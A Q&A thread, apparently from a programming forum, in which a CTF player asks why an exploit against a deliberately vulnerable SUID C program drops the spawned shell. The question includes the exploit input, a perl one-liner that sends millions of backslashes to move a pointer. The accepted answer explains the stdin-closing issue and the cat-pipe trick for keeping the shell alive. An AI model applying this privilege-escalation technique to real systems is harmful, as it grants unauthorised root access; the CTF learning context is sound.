# gdb exiting instead of spawning a shell

Tags: c, bash, shell, gdb, suid

I am trying to exploit a SUID program.

The program is:

```
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>


#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }

void print(unsigned char *buf, int len)
{
    int i;
    printf("[ ");
    for(i=0; i < len; i++) printf("%x ", buf[i]); 
    printf(" ]\n");
}

int main()
{
    unsigned char buf[512];
    unsigned char *ptr = buf + (sizeof(buf)/2);
    unsigned int x;

    while((x = getchar()) != EOF) {
            switch(x) {
                    case '\n': print(buf, sizeof(buf)); continue; break;
                    case '\\': ptr--; break; 
                    default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
            }
    }
    printf("All done\n");
}
```

We can easily see that if we somehow change ptr's contents to some address that starts with CA then a new shell will be spawned for us. And as ptr normally holds some address starting with FF the way to decrease it(ptr) is to enter \ character. So I make a file with 0x35000000 '\' characters, and finally 3 'a' at the end of the file

```
perl -e "print '\\\'x889192448" > file     # decimal equivalent of 0x35000000
echo aaa > file        # So that e() is called which actually spawns the shell
```

And finally in gdb,

```
run < file
```

However instead of spawning a shell gdb is saying

```
process <some number> is executing new program /bin/dash
inferior 1 exited normally
```

And then back to gdb prompt instead of getting a shell.
I have confirmed by setting breakpoints at appropriate locations that ptr is indeed starting with CA before setresuid() gets called.

Also if I pipe this outside of gdb, nothing happens.

```
./vulnProg < file
```

Bash prompt returns back.

Please tell me where am I making mistake.

Comment: What happens if you strip out all the cruft and just do `int main() {setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }`? Does that actually do what you expect?

Comment: Sorry, but I cannot do that because the program is on a remote CTF server and I have limited privileges.

Answer (score 6, accepted):

You can see the problem by compiling a simpler test program

```
int main()  { execlp("/bin/sed", "-e", "s/^/XXX:/", NULL); }
```

All this does is start a version of sed (rather than the shell) and converts input by prepending "XXX:".

If you run the resulting program, and type in the Terminal you get behaviour like this:

```
$./a.out 
Hello
XXX:Hello
Test
XXX:Test
^D
```

Which is exactly as we'd expect.

Now if you feed it input from a file containing "Hello\nWorld" you get

```
$./a.out < file 
XXX:Hello
XXX:World
$
```

And the application exits immediately, with the input stream to the application being closed when the input file has all been read.

If you want to provide additional input, you need to use a trick to not break the input stream.

```
{ cat file ; cat - ; } | ./a.out
```

This will put all the input from file into a running `./a.out` and then
read from stdin and add that too.

```
$ { cat file ; cat - ; } | ./a.out
XXX:Hello
XXX:World
This is a Test
XXX:This is a Test
```

Comment: Thank you very much. I have just a small problem. If I wanted to put the '\' on a file(say payload) and the commands I want to be executed on a file(say commandsFile), then                                                                                           ...cat payload commandsFile | ./vulnProg                                                                   ...executes the commands and shows the result, but                                  ...cat payload commandsFile > combinedFile; cat combinedFile > ./vulnProg... doesn't show any result. What is the difference between the two?

Comment: `>` means write it to this file, `|` use it as input to a new process. So `cat a > ./b` will overwrite `./b` with the contents of `a`, (not execute `b`), while `cat a | ./b` will execute `b` and give it the contents of `a` as its input.